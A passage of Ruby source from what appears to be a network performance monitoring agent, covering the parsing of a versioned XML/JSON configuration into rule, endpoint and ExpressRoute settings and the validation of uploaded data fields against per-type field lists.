  # IDs. Unresolvable subnets increment @@network_subnet_drops; note the
  # (possibly empty) _subnet hash is pushed regardless.
  def self.createNetworkElements(networkArray, subnetIdHash)
    _networks = Array.new
    networkArray.each do |x|
      _network = Hash.new
      _network["Name"] = x["Name"];
      _network["Subnet"] = Array.new
      x["Subnets"].each do |sn|
        _subnet = Hash.new
        _subnetId = subnetIdHash[sn]
        if _subnetId.nil?
          Logger::logWarn "Did not find subnet id for subnet name #{sn} in hash", 2*Logger::loop
          @@network_subnet_drops += 1
        else
          _subnet["ID"] = subnetIdHash[sn];
          _subnet["Disabled"] = "False" # TODO
          _subnet["Tag"] = "" # TODO
        end
        _network["Subnet"].push(_subnet);
      end
      _networks.push(_network);
      # NOTE(review): same pattern as createAgentElements — this check
      # can never be true inside the loop; @@network_drops never counts.
      if _networks.empty?
        @@network_drops += 1
      end
    end
    _networks
  end

  # Expands rule/exception "act on" entries into subnet-pair elements.
  # "*" (or "") means wildcard; pairs whose subnet names cannot be
  # resolved are dropped and counted in @@rule_subnetpair_drops.
  def self.createActOnElements(elemArray, subnetIdHash)
    _networkTestMatrix = Array.new
    elemArray.each do |a|
      _sSubnetId = "*"
      _dSubnetId = "*"
      if a["SS"] != "*" and a["SS"] != ""
        _sSubnetId = subnetIdHash[a["SS"].to_s]
      end
      if a["DS"] != "*" and a["DS"] != ""
        _dSubnetId = subnetIdHash[a["DS"].to_s]
      end
      if _sSubnetId.nil?
        Logger::logWarn "Did not find subnet id for source subnet name #{a["SS"].to_s} in hash", 2*Logger::loop
        @@rule_subnetpair_drops += 1
      elsif _dSubnetId.nil?
        Logger::logWarn "Did not find subnet id for destination subnet name #{a["DS"].to_s} in hash", 2*Logger::loop
        @@rule_subnetpair_drops += 1
      else
        # Process each subnetpair
        _snPair = Hash.new
        _snPair["SourceSubnet"] = _sSubnetId
        _snPair["SourceNetwork"] = a["SN"]
        _snPair["DestSubnet"] = _dSubnetId
        _snPair["DestNetwork"] = a["DN"]
        _networkTestMatrix.push(_snPair);
      end
    end
    _networkTestMatrix
  end

  # Maps parsed rules to rule elements. Rules whose test matrix ends up
  # empty are skipped (no thresholds filled) and counted in @@rule_drops,
  # but note the partially built _rule is still pushed below.
  def self.createRuleElements(ruleArray, subnetIdHash)
    _rules = Array.new
    ruleArray.each do |x|
      _rule = Hash.new
      _rule["Name"] = x["Name"];
      _rule["Description"] = x["Description"]
      _rule["Protocol"] = x["Protocol"].to_s;
      _rule["NetworkTestMatrix"] = createActOnElements(x["Rules"], subnetIdHash);
      _rule["AlertConfiguration"] = Hash.new;
      _rule["Exceptions"] = createActOnElements(x["Exceptions"], subnetIdHash);
      _rule["DiscoverPaths"] = x["DiscoverPaths"].to_s
      if _rule["NetworkTestMatrix"].empty?
        Logger::logWarn "Skipping rule #{x["Name"]} as network test matrix is empty", Logger::loop
        @@rule_drops += 1
      else
        # Alert Configuration
        _rule["AlertConfiguration"]["ChecksFailedPercent"] = x["LossThreshold"].to_s
        _rule["AlertConfiguration"]["RoundTripTimeMs"] = x["LatencyThreshold"].to_s
      end
      if !_rule.empty?
        _rules.push(_rule)
      end
    end
    _rules
  end

  # Builds the EPM (endpoint monitoring) rule list. Threshold sentinel
  # values: -2 means "enabled with default", -3 means "absent"; tests are
  # flagged enabled when the .to_i of the threshold is >= -2.
  def self.createEpmElements(epmHash)
    return if epmHash.nil?
    _epmRules = Hash.new
    _rule = Array.new
    epmHash.each do |key, rules|
      for i in 0..rules.length-1
        _ruleHash = Hash.new
        _iRule = rules[i] # get individual rule
        _ruleHash["ID"] = _iRule["ID"]
        _ruleHash["Name"] = _iRule["Name"]
        _ruleHash["CMResourceId"] = _iRule.has_key?("CMResourceId") ? _iRule["CMResourceId"] : String.new
        _ruleHash["IngestionWorkspaceId"] = _iRule.has_key?("IngestionWorkspaceId") ? _iRule["IngestionWorkspaceId"] : String.new
        _ruleHash["WorkspaceAlias"] = _iRule.has_key?("WorkspaceAlias") ? _iRule["WorkspaceAlias"] : String.new
        _ruleHash["Redirect"] = "false"
        _ruleHash["WorkspaceResourceID"] = _iRule["WorkspaceResourceID"];
        _ruleHash["DiscoverPaths"] = _iRule.has_key?("DiscoverPaths") ? _iRule["DiscoverPaths"].to_s : "true"
        _ruleHash["NetTests"] = (_iRule["NetworkThresholdLoss"].to_i >= -2 and _iRule["NetworkThresholdLatency"].to_i >= -2) ? "true" : "false"
        _ruleHash["AppTests"] = (_iRule["AppThresholdLatency"].to_i >= -2) ? "true" : "false"
        _ruleHash["ValidStatusCodeRanges"] = _iRule.has_key?("ValidStatusCodeRanges") ? _iRule["ValidStatusCodeRanges"] : nil;
        if (_ruleHash["NetTests"] == "true")
          _ruleHash["NetworkThreshold"] = {"ChecksFailedPercent" => _iRule["NetworkThresholdLoss"].to_s, "RoundTripTimeMs" => _iRule["NetworkThresholdLatency"].to_s}
        end
        if (_ruleHash["AppTests"] == "true")
          _ruleHash["AppThreshold"] = {"ChecksFailedPercent" => (_iRule.has_key?("AppThresholdLoss") ? _iRule["AppThresholdLoss"].to_s : nil), "RoundTripTimeMs" => _iRule["AppThresholdLatency"].to_s}
        end
        # Fill endpoints
        _epList = _iRule["Endpoints"]
        _endpointList = Array.new
        for j in 0.._epList.length-1
          _epHash = Hash.new
          _epHash["Name"] = _epList[j]["Name"]
          _epHash["ID"] = _epList[j]["Id"]
          _epHash["DestAddress"] = _epList[j]["URL"]
          _epHash["DestPort"] = _epList[j]["Port"].to_s
          _epHash["TestProtocol"] = _epList[j]["Protocol"]
          _epHash["MonitoringInterval"] = _iRule["Poll"].to_s
          _epHash["TimeDrift"] = _epList[j]["TimeDrift"].to_s
          _endpointList.push(_epHash)
        end
        _ruleHash["Endpoints"] = _endpointList
        _rule.push(_ruleHash)
      end
    end
    _epmRules["Rules"] = _rule
    _epmRules
  end

  # Builds the ExpressRoute section: private-peering rules keyed
  # "PrivatePeeringRules" (emitted under the :PrivateRules symbol key)
  # and Microsoft-peering rules keyed "MSPeeringRules".
  def self.createERElements(erHash)
    return if erHash.nil?
    _er = Hash.new
    erHash.each do |key, rules|
      # Fill Private Peering Rules
      if key == "PrivatePeeringRules"
        _ruleList = Array.new
        for i in 0..rules.length-1
          _pvtRule = Hash.new
          _iRule = rules[i]
          _pvtRule["Name"] = _iRule["Name"]
          _pvtRule["ConnectionResourceId"] = _iRule["ConnectionResourceId"]
          _pvtRule["CircuitResourceId"] = _iRule["CircuitResourceId"]
          _pvtRule["CircuitName"] = _iRule["CircuitName"]
          _pvtRule["VirtualNetworkName"] = _iRule["vNetName"]
          _pvtRule["Protocol"] = _iRule["Protocol"].to_s
          #Thresholds
          _thresholdMap = Hash.new
          _thresholdMap["ChecksFailedPercent"] = _iRule["LossThreshold"].to_s
          _thresholdMap["RoundTripTimeMs"] = _iRule["LatencyThreshold"].to_s
          _pvtRule["AlertConfiguration"] = _thresholdMap
          #OnPremAgents
          _onPremAgents = Array.new
          _onPremAgentList = _iRule["OnPremAgents"]
          for j in 0.._onPremAgentList.length-1
            _onPremAgents.push(_onPremAgentList[j])
          end
          _pvtRule["OnPremAgents"] = _onPremAgents
          #AzureAgents
          _azureAgents = Array.new
          _azureAgentsList = _iRule["AzureAgents"]
          for k in 0.._azureAgentsList.length-1
            _azureAgents.push(_azureAgentsList[k])
          end
          _pvtRule["AzureAgents"] = _azureAgents
          _ruleList.push(_pvtRule)
        end
        _er[:"PrivateRules"] = _ruleList if !_ruleList.empty?
      end
      # Fill MS Peering Rules
      if key == "MSPeeringRules"
        _ruleList = Array.new
        for i in 0..rules.length-1
          _msRule = Hash.new
          _iRule = rules[i]
          _msRule["Name"] = _iRule["Name"]
          _msRule["CircuitName"] = _iRule["CircuitName"]
          _msRule["Protocol"] = _iRule["Protocol"].to_s
          _msRule["CircuitResourceId"] = _iRule["CircuitResourceId"]
          #Thresholds
          _thresholdMap = Hash.new
          _thresholdMap["ChecksFailedPercent"] = _iRule["LossThreshold"].to_s
          _thresholdMap["RoundTripTimeMs"] = _iRule["LatencyThreshold"].to_s
          _msRule["AlertConfiguration"] = _thresholdMap
          #OnPremAgents
          _onPremAgents = Array.new
          _onPremAgentList = _iRule["OnPremAgents"]
          for j in 0.._onPremAgentList.length-1
            _onPremAgents.push(_onPremAgentList[j])
          end
          _msRule["OnPremAgents"] = _onPremAgents
          #Urls
          _urls = Array.new
          _urlList = _iRule["UrlList"]
          for k in 0.._urlList.length-1
            _urlHash = Hash.new
            _urlHash["Target"] = _urlList[k]["url"]
            _urlHash["Port"] = _urlList[k]["port"].to_s
            _urls.push(_urlHash)
          end
          _msRule["URLs"] = _urls
          _ruleList.push(_msRule)
        end
        _er[:"MSPeeringRules"] = _ruleList if !_ruleList.empty?
      end
    end
    _er
  end
end
# This class holds the methods for parsing
# a config sent via DSC into a hash
# Parses the version-3 DSC UI XML configuration into a plain hash
# ({"Metadata", "Networks", "Subnets", "Agents", and optionally "Rules",
# "Epm", "ER"}) consumed by AgentConfigCreator.
#
# Fix: getEpmHashFromJson previously called `_test.has_key?[...]` —
# has_key? with no arguments followed by indexing the result — which
# raised on every EPM rule carrying ValidStatusCodeRanges handling; it
# now calls has_key?("ValidStatusCodeRanges") as intended. Two
# unreachable trailing `nil` statements (after return/raise) were also
# removed.
class UIConfigParser
  public
  # Only accessible method
  # Returns the parsed config hash, or nil when the document is empty,
  # the version is unsupported, or any mandatory section fails to parse.
  # Raises (after logging) on XML parse errors.
  def self.parse(string)
    begin
      _doc = REXML::Document.new(string)
      if _doc.elements.empty? or _doc.root.nil?
        Logger::logWarn "UI config string converted to nil/empty rexml doc"
        return nil
      end
      _configVersion = _doc.elements[RootConfigTag].attributes[Version].to_i
      unless _configVersion == 3
        Logger::logWarn "Config version #{_configVersion} is not supported"
        return nil
      else
        Logger::logInfo "Supported version of config #{_configVersion} found"
      end
      _config = _doc.elements[RootConfigTag + "/" + SolnConfigV3Tag]
      if _config.nil? or _config.elements.empty?
        Logger::logWarn "found nothing for path #{RootConfigTag}/#{SolnConfigV3Tag} in config string"
        return nil
      end
      # Cached for getCurrentAgentId / getEpmHashFromJson lookups below.
      @agentData = JSON.parse(_config.elements[AgentInfoTag].text())
      @metadata = JSON.parse(_config.elements[MetadataTag].text())
      _h = Hash.new
      _h[KeyMetadata] = @metadata
      _h[KeyNetworks] = getNetworkHashFromJson(_config.elements[NetworkInfoTag].text())
      _h[KeySubnets] = getSubnetHashFromJson(_config.elements[SubnetInfoTag].text())
      _h[KeyAgents] = getAgentHashFromJson(_config.elements[AgentInfoTag].text())
      _h[KeyRules] = getRuleHashFromJson(_config.elements[RuleInfoTag].text()) unless _config.elements[RuleInfoTag].nil?
      _h[KeyEpm] = getEpmHashFromJson(_config.elements[EpmInfoTag].text()) unless _config.elements[EpmInfoTag].nil?
      _h[KeyER] = getERHashFromJson(_config.elements[ERInfoTag].text()) unless _config.elements[ERInfoTag].nil?
      _h = nil if (_h[KeyNetworks].nil? or _h[KeySubnets].nil? or _h[KeyAgents].nil?)
      if _h == nil
        Logger::logError "UI Config parsed as nil"
      end
      return _h
    rescue REXML::ParseException => e
      Logger::logError "Got XML parse exception at #{e.line()}, #{e.position()}", Logger::resc
      raise "Got XML parse exception at #{e.line()}, #{e.position()}"
    end
  end

  private

  # XML tag / attribute names of the v3 configuration schema.
  RootConfigTag = "Configuration"
  SolnConfigV3Tag = "NetworkMonitoringAgentConfigurationV3"
  MetadataTag = "Metadata"
  NetworkInfoTag = "NetworkNameToNetworkMap"
  SubnetInfoTag = "SubnetIdToSubnetMap"
  AgentInfoTag = "AgentFqdnToAgentMap"
  RuleInfoTag = "RuleNameToRuleMap"
  EpmInfoTag = "EPMConfiguration"
  EpmTestInfoTag = "TestIdToTestMap"
  EpmCMInfoTag = "ConnectionMonitorIdToInfoMap"
  EpmEndpointInfoTag = "EndpointIdToEndpointMap"
  EpmAgentInfoTag = "AgentIdToTestIdsMap"
  ERInfoTag = "erConfiguration"
  ERPrivatePeeringInfoTag = "erPrivateTestIdToERTestMap";
  ERMSPeeringInfoTag = "erMSTestIdToERTestMap";
  ERCircuitInfoTag = "erCircuitIdToCircuitResourceIdMap";
  Version = "Version"
  # Keys of the hash returned by parse.
  KeyMetadata = "Metadata"
  KeyNetworks = "Networks"
  KeySubnets = "Subnets"
  KeyAgents = "Agents"
  KeyRules = "Rules"
  KeyEpm = "Epm"
  KeyER = "ER"

  # Hash of {AgentID => {AgentContract}}
  @agentData = {}
  # Hash of Metadata
  @metadata = {}

  # Identifies this machine's agent ID by matching any local interface
  # address against the IPs listed in @agentData. Returns "" when no
  # match is found.
  def self.getCurrentAgentId()
    begin
      _agentId = ""
      _ips = []
      addr_infos = Socket.getifaddrs
      addr_infos.each do |addr_info|
        if addr_info.addr and (addr_info.addr.ipv4? or addr_info.addr.ipv6?)
          _ips.push(addr_info.addr.ip_address)
        end
      end
      @agentData.each do |key, value|
        next if value.nil? or !(value["IPs"].is_a?Array)
        value["IPs"].each do |ip|
          for ipAddr in _ips
            if ip["Value"] == ipAddr
              _agentId = key
              break
            end
          end
        end
      end
      return _agentId
    end
  end

  # JSON {name => {"Subnets" => [...]}} -> [{"Name", "Subnets"}].
  # Returns nil (and logs) on malformed JSON.
  def self.getNetworkHashFromJson(text)
    begin
      _h = JSON.parse(text)
      _a = Array.new
      _h.each do |key, value|
        next if value.nil? or value["Subnets"].nil?
        _network = Hash.new
        _network["Name"] = key
        _network["Subnets"] = value["Subnets"]
        _a << _network
      end
      _a
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in network data: #{e}", Logger::resc
      nil
    end
  end

  # Subnet map passes through as the parsed JSON hash; nil on bad JSON.
  def self.getSubnetHashFromJson(text)
    begin
      _h = JSON.parse(text)
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in subnet data: #{e}", Logger::resc
      nil
    end
  end

  # JSON {fqdn => agent} -> [{"Guid", "Capability", "IPs" => [{"IP","SubnetName"}]}].
  def self.getAgentHashFromJson(text)
    begin
      _h = JSON.parse(text)
      _a = Array.new
      _h.each do |key, value|
        next if value.nil? or !(value["IPs"].is_a?Array)
        _agent = Hash.new
        _agent["Guid"] = key
        _agent["Capability"] = value["Protocol"] unless value["Protocol"].nil?
        _agent["IPs"] = Array.new
        value["IPs"].each do |ip|
          _tempIp = Hash.new
          _tempIp["IP"] = ip["Value"]
          # Store agent subnet name as string
          _tempIp["SubnetName"] = ip["Subnet"].to_s
          _agent["IPs"] << _tempIp
        end
        _a << _agent
      end
      _a
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in agent data: #{e}", Logger::resc
      nil
    end
  end

  # JSON {name => rule} -> rule array. Threshold sentinels: "-2"/"-2.0"
  # mean "key present but value missing".
  def self.getRuleHashFromJson(text)
    begin
      _h = JSON.parse(text)
      _a = Array.new
      _h.each do |key, value|
        next if value.nil? or
                !(value["ActOn"].is_a?Array) or
                !(value["Exceptions"].is_a?Array)
        _rule = Hash.new
        _rule["Name"] = key
        _rule["LossThreshold"] = (!value["Threshold"].nil? and value["Threshold"].has_key?("Loss")) ? value["Threshold"]["Loss"] : "-2"
        _rule["LatencyThreshold"] = (!value["Threshold"].nil? and value["Threshold"].has_key?("Latency")) ? value["Threshold"]["Latency"] : "-2.0"
        _rule["Protocol"] = value["Protocol"] unless value["Protocol"].nil?
        _rule["Rules"] = value["ActOn"]
        _rule["Exceptions"] = value["Exceptions"]
        _rule["DiscoverPaths"] = value.has_key?("DiscoverPaths") ? value["DiscoverPaths"].to_s : "true"
        _rule["Description"] = value["Description"]
        _rule["Enabled"] = value["Enabled"]
        _a << _rule
      end
      _a
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in rule data: #{e}", Logger::resc
      nil
    end
  end

  # Builds the EPM rule list for the tests assigned to this agent
  # (looked up by getCurrentAgentId). Returns nil when this host is not
  # a known agent; raises (after logging) on JSON errors.
  def self.getEpmHashFromJson(text)
    begin
      _h = JSON.parse(text)
      _agentId = getCurrentAgentId()
      if _agentId.empty?
        return nil
      else
        _epmRules = {"Rules" => []}
        # Check all tests related to current agent id and push their configurations to current agent
        _testIds = _h[EpmAgentInfoTag][_agentId]
        return if _testIds.nil?
        _testIds.each do |testId|
          _test = _h[EpmTestInfoTag][testId]
          _rule = Hash.new
          _rule["ID"] = testId
          _rule["Name"] = _test["Name"]
          _rule["Poll"] = _test["Poll"]
          _rule["WorkspaceResourceID"] = @metadata.has_key?("WorkspaceResourceID") ? @metadata["WorkspaceResourceID"] : String.new
          _rule["DiscoverPaths"] = _test.has_key?("DiscoverPaths") ? _test["DiscoverPaths"].to_s : "true"
          # Sentinels: -3/-3.0 = threshold section absent, -2/-2.0 = key absent.
          _rule["AppThresholdLoss"] = _test["AppThreshold"].nil? ? "-3" : (_test["AppThreshold"].has_key?("Loss") ? _test["AppThreshold"]["Loss"] : "-2")
          _rule["AppThresholdLatency"] = _test["AppThreshold"].nil? ? "-3.0" : (_test["AppThreshold"].has_key?("Latency") ? _test["AppThreshold"]["Latency"] : "-2.0")
          _rule["NetworkThresholdLoss"] = _test["NetworkThreshold"].nil? ? "-3" : (_test["NetworkThreshold"].has_key?("Loss") ? _test["NetworkThreshold"]["Loss"] : "-2")
          _rule["NetworkThresholdLatency"] = _test["NetworkThreshold"].nil? ? "-3.0" : (_test["NetworkThreshold"].has_key?("Latency") ? _test["NetworkThreshold"]["Latency"] : "-2.0")
          # BUGFIX: was `_test.has_key?["ValidStatusCodeRanges"]`, which
          # calls has_key? with no args and then indexes the result.
          _rule["ValidStatusCodeRanges"] = _test.has_key?("ValidStatusCodeRanges") ? _test["ValidStatusCodeRanges"] : nil
          _connectionMonitorId = _test.has_key?("ConnectionMonitorId") ? _test["ConnectionMonitorId"].to_s : String.new
          # Iterate over ConnectionMonitorInfoMap to get following info
          if !_connectionMonitorId.empty?
            _cmMap = _h.has_key?(EpmCMInfoTag) ? _h[EpmCMInfoTag] : Hash.new
            if !_cmMap.empty?
              _cmId = _cmMap[_connectionMonitorId.to_s]
              _rule["CMResourceId"] = _cmId["resourceId"]
              _rule["IngestionWorkspaceId"] = _cmId["ingestionWorkspaceId"]
              _rule["WorkspaceAlias"] = _cmId["workspaceAlias"]
            end
          end
          # Collect endpoints details
          _rule["Endpoints"] = []
          # Get the list of endpoint ids
          _endpoints = _test["Endpoints"]
          _endpoints.each do |ep|
            _endpointHash = Hash.new
            _endpoint = _h[EpmEndpointInfoTag][ep]
            _endpointHash["Id"] = ep
            _endpointHash["Name"] = _endpoint.has_key?("name") ? _endpoint["name"] : String.new
            _endpointHash["URL"] = _endpoint["url"]
            _endpointHash["Port"] = _endpoint["port"]
            _endpointHash["Protocol"] = _endpoint["protocol"]
            _endpointHash["TimeDrift"] = getEndpointTimedrift(testId, ep, _test["Poll"], getWorkspaceId()) #TODO
            _rule["Endpoints"].push(_endpointHash)
          end
          _epmRules["Rules"].push(_rule)
        end
      end
      _epmRules
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in EPM data: #{e}", Logger::resc
      raise "Got exception in EPM parsing: #{e}"
    end
  end

  # Returns the workspace ID from metadata, or "" when absent.
  def self.getWorkspaceId()
    begin
      _workspaceId = @metadata.has_key?("WorkspaceID") ? @metadata["WorkspaceID"] : String.new
      return _workspaceId
    end
  end

  # Deterministic per-(test, endpoint, workspace) offset in seconds,
  # spread across the monitoring interval so probes do not align.
  # NOTE(review): assumes monitoringInterval is numeric (minutes) —
  # a String here would repeat instead of multiply; confirm upstream.
  def self.getEndpointTimedrift(testId, endpointId, monitoringInterval, workspaceId)
    begin
      hashString = testId + endpointId + workspaceId
      monIntervalInSecs = monitoringInterval * 60
      hashCode = getHashCode(hashString)
      timeDrift = hashCode % monIntervalInSecs
      return timeDrift.to_s
    end
  end

  # Java-style 31-based string hash, reduced mod 2**31 - 1.
  def self.getHashCode(str)
    result = 0
    mul = 1
    max_mod = 2**31 - 1
    str.chars.reverse_each do |c|
      result += mul * c.ord
      result %= max_mod
      mul *= 31
    end
    result
  end

  # Builds the ExpressRoute rule lists for tests that include this
  # agent (on-prem or Azure side). Returns nil when this host is not a
  # known agent, or on malformed JSON.
  def self.getERHashFromJson(text)
    begin
      _h = JSON.parse(text)
      _agentId = getCurrentAgentId()
      if _agentId.empty?
        return nil
      else
        _erRules = {"PrivatePeeringRules" => [], "MSPeeringRules" => []}
        # Iterate over OnPrem and Azure Agent Lists to check if this agent is part of this test
        _privateTestMap = _h[ERPrivatePeeringInfoTag]
        _microsoftTestMap = _h[ERMSPeeringInfoTag]
        _circuitIdMap = _h[ERCircuitInfoTag]
        if _privateTestMap.empty? && _microsoftTestMap.empty?
          Logger::logInfo "ER configuration is not present"
        end
        # Private Peering Rules
        if !_privateTestMap.empty?
          _privateTestMap.each do |key, value|
            # Get list of onPremAgents in this test
            _isAgentPresent = false
            _privateRule = Hash.new
            _onPremAgents = value["onPremAgents"]
            _onPremAgents.each do |x|
              if x == _agentId
                # Append this test to ER Config
                _isAgentPresent = true
                _privateRule = getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
                break;
              end
            end
            if !_isAgentPresent
              _azureAgents = value["azureAgents"]
              _azureAgents.each do |x|
                if x == _agentId
                  _isAgentPresent = true
                  _privateRule = getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
                  break;
                end
              end
            end
            if !_privateRule.empty?
              _erRules["PrivatePeeringRules"].push(_privateRule)
            end
          end
        end
        # MS Peering Rules
        if !_microsoftTestMap.empty?
          _microsoftTestMap.each do |key, value|
            _microsoftRule = Hash.new
            _onPremAgents = value["onPremAgents"]
            _onPremAgents.each do |x|
              if x == _agentId
                # Append this test to ER Config
                _isAgentPresent = true
                _microsoftRule = getERMicrosoftRuleFromUIConfig(key, value, _circuitIdMap)
                break;
              end
            end
            if !_microsoftRule.empty?
              _erRules["MSPeeringRules"].push(_microsoftRule)
            end
          end
        end
        _erRules
      end
    rescue JSON::ParserError => e
      Logger::logError "Error in Json Parse in ER data: #{e}", Logger::resc
      nil
    end
  end

  # Maps one private-peering UI test entry to the internal rule hash.
  def self.getERPrivateRuleFromUIConfig(key, value, _circuitIdMap)
    _ruleHash = Hash.new
    _ruleHash["Name"] = key
    _ruleHash["Protocol"] = value["protocol"]
    _ruleHash["CircuitId"] = value["circuitId"]
    _ruleHash["LossThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("loss")) ? value["threshold"]["loss"] : "-2"
    _ruleHash["LatencyThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("latency")) ? value["threshold"]["latency"] : "-2.0"
    _ruleHash["CircuitName"] = value["circuitName"]
    _ruleHash["vNetName"]= value["vNet"]
    _ruleHash["ConnectionResourceId"]= value["connectionResourceId"]
    _ruleHash["CircuitResourceId"] = _circuitIdMap[value["circuitId"]]
    _ruleHash["OnPremAgents"] = value["onPremAgents"]
    _ruleHash["AzureAgents"] = value["azureAgents"]
    return _ruleHash
  end

  # Maps one Microsoft-peering UI test entry to the internal rule hash.
  def self.getERMicrosoftRuleFromUIConfig(key, value, _circuitIdMap)
    _ruleHash = Hash.new
    _ruleHash["Name"] = key
    _ruleHash["CircuitName"] = value["circuitName"]
    _ruleHash["CircuitId"] = value["circuitId"]
    _ruleHash["Protocol"] = value["protocol"]
    _ruleHash["CircuitResourceId"] = _circuitIdMap[value["circuitId"]]
    _ruleHash["LossThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("loss")) ? value["threshold"]["loss"] : "-2"
    _ruleHash["LatencyThreshold"] = (!value["threshold"].nil? and value["threshold"].has_key?("latency")) ? value["threshold"]["latency"] : "-2.0"
    _ruleHash["UrlList"] = value["urlList"]
    _ruleHash["OnPremAgents"] = value["onPremAgents"]
    return _ruleHash
  end
end
# Public entry point of this module: converts the DSC UI XML into the
# agent JSON configuration plus a summary string of dropped entries.
def self.GetAgentConfigFromUIConfig(uiXml)
  parsed_ui = UIConfigParser.parse(uiXml)
  AgentConfigCreator.resetErrorCheck()
  [AgentConfigCreator.createJsonFromUIConfigHash(parsed_ui),
   AgentConfigCreator.getErrorSummary()]
end
end
# NPM Contracts verification for data being uploaded
# Validates upload data items against the field contract for their item
# type. IsValidDataitem returns [DATAITEM_VALID, nil] on success,
# [DATAITEM_ERR_INVALID_TYPE, nil] for an unknown item type, or
# [DATAITEM_ERR_INVALID_FIELDS, offending_key] for an unexpected field.
#
# Refactor: the long if/elsif dispatch is replaced by a frozen lookup
# table and the key lists are frozen %w[] literals; types, names, and
# results are unchanged.
module NPMContract
  DATAITEM_AGENT = "agent"
  DATAITEM_PATH = "path"
  DATAITEM_DIAG = "diagnostics"
  DATAITEM_ENDPOINT_HEALTH = "endpointHealth"
  DATAITEM_ENDPOINT_MONITORING = "endpointMonitoringData"
  DATAITEM_ENDPOINT_DIAGNOSTICS = "endpointDiagnostics"
  DATAITEM_EXROUTE_MONITORING = "expressrouteMonitoringData"
  DATAITEM_CONNECTIONMONITOR_TEST = "connectionMonitorTestResult"
  DATAITEM_CONNECTIONMONITOR_PATH = "connectionMonitorPathData"
  DATAITEM_AGENT_DIAGNOSTICS = "agentDiagnostics"

  # Validation result codes.
  DATAITEM_VALID = 1
  DATAITEM_ERR_INVALID_FIELDS = 2
  DATAITEM_ERR_INVALID_TYPE = 3

  CONTRACT_AGENT_DATA_KEYS = %w[
    AgentFqdn AgentIP AgentCapability SubnetId PrefixLength AddressType
    SubType TimeGenerated OSType NPMAgentEnvironment
  ].freeze

  CONTRACT_AGENT_DIAGNOSTICS_KEYS = %w[
    SubType TimeGenerated NotificationCode NotificationType Computer
  ].freeze

  CONTRACT_PATH_DATA_KEYS = %w[
    SourceNetwork SourceNetworkNodeInterface SourceSubNetwork
    DestinationNetwork DestinationNetworkNodeInterface
    DestinationSubNetwork RuleName TimeSinceActive LossThreshold
    LatencyThreshold LossThresholdMode LatencyThresholdMode SubType
    HighLatency MedianLatency LowLatency LatencyHealthState Loss
    LossHealthState Path Computer TimeGenerated Protocol
    MinHopLatencyList MaxHopLatencyList AvgHopLatencyList
    TraceRouteCompletionTime
  ].freeze

  CONTRACT_DIAG_DATA_KEYS = %w[SubType Message].freeze

  CONTRACT_ENDPOINT_HEALTH_DATA_KEYS = %w[
    SubType TestName ServiceTestId ConnectionMonitorResourceId Target
    Port EndpointId Protocol TimeSinceActive ServiceResponseTime
    ServiceLossPercent ServiceLossHealthState ServiceResponseHealthState
    ResponseCodeHealthState ServiceResponseThresholdMode
    ServiceResponseThreshold ServiceResponseCode Loss LossHealthState
    LossThresholdMode LossThreshold NetworkTestEnabled MedianLatency
    HighLatency LowLatency LatencyThresholdMode LatencyThreshold
    LatencyHealthState TimeGenerated Computer
  ].freeze

  CONTRACT_ENDPOINT_PATH_DATA_KEYS = %w[
    SubType TestName ServiceTestId ConnectionMonitorResourceId Target
    Port TimeSinceActive EndpointId SourceNetworkNodeInterface
    DestinationNetworkNodeInterface Path Loss NetworkTestEnabled
    HighLatency MedianLatency LowLatency LossHealthState
    LatencyHealthState LossThresholdMode LossThreshold
    LatencyThresholdMode LatencyThreshold Computer Protocol
    MinHopLatencyList MaxHopLatencyList AvgHopLatencyList
    TraceRouteCompletionTime TimeGenerated
  ].freeze

  CONTRACT_ENDPOINT_DIAG_DATA_KEYS = %w[
    SubType TestName ServiceTestId ConnectionMonitorResourceId Target
    NotificationCode EndpointId TimeGenerated Computer
  ].freeze

  CONTRACT_EXROUTE_MONITOR_DATA_KEYS = %w[
    SubType TimeGenerated Circuit ComputerEnvironment vNet Target
    PeeringType CircuitResourceId ConnectionResourceId Path
    SourceNetworkNodeInterface DestinationNetworkNodeInterface Loss
    HighLatency MedianLatency LowLatency LossHealthState
    LatencyHealthState RuleName TimeSinceActive LossThreshold
    LatencyThreshold LossThresholdMode LatencyThresholdMode Computer
    Protocol MinHopLatencyList MaxHopLatencyList AvgHopLatencyList
    TraceRouteCompletionTime DiagnosticHop DiagnosticHopLatency
  ].freeze

  CONTRACT_CONNECTIONMONITOR_TEST_RESULT_KEYS = %w[
    SubType RecordId Computer ConnectionMonitorResourceId TimeCreated
    TestGroupName TestConfigurationName SourceType SourceResourceId
    SourceAddress SourceName SourceAgentId DestinationType
    DestinationResourceId DestinationAddress DestinationName
    DestinationAgentId Protocol DestinationPort DestinationIP
    ChecksTotal ChecksFailed ChecksFailedPercentThreshold
    RoundTripTimeMsThreshold MinRoundTripTimeMs MaxRoundTripTimeMs
    AvgRoundTripTimeMs TestResult AdditionalData
    IngestionWorkspaceResourceId
  ].freeze

  CONTRACT_CONNECTIONMONITOR_PATH_DATA_KEYS = %w[
    SubType RecordId Computer TopologyId ConnectionMonitorResourceId
    TimeCreated TestGroupName TestConfigurationName SourceType
    SourceResourceId SourceAddress SourceName SourceAgentId
    DestinationType DestinationResourceId DestinationAddress
    DestinationName DestinationAgentId ChecksTotal ChecksFailed
    ChecksFailedPercentThreshold RoundTripTimeMsThreshold
    MinRoundTripTimeMs MaxRoundTripTimeMs AvgRoundTripTimeMs
    HopAddresses HopTypes HopLinkTypes HopResourceIds Issues Hops
    DestinationPort Protocol PathTestResult AdditionalData
    IngestionWorkspaceResourceId
  ].freeze

  # Dispatch table: item type string -> allowed field list.
  CONTRACT_FOR_TYPE = {
    DATAITEM_AGENT => CONTRACT_AGENT_DATA_KEYS,
    DATAITEM_PATH => CONTRACT_PATH_DATA_KEYS,
    DATAITEM_DIAG => CONTRACT_DIAG_DATA_KEYS,
    DATAITEM_ENDPOINT_HEALTH => CONTRACT_ENDPOINT_HEALTH_DATA_KEYS,
    DATAITEM_ENDPOINT_MONITORING => CONTRACT_ENDPOINT_PATH_DATA_KEYS,
    DATAITEM_ENDPOINT_DIAGNOSTICS => CONTRACT_ENDPOINT_DIAG_DATA_KEYS,
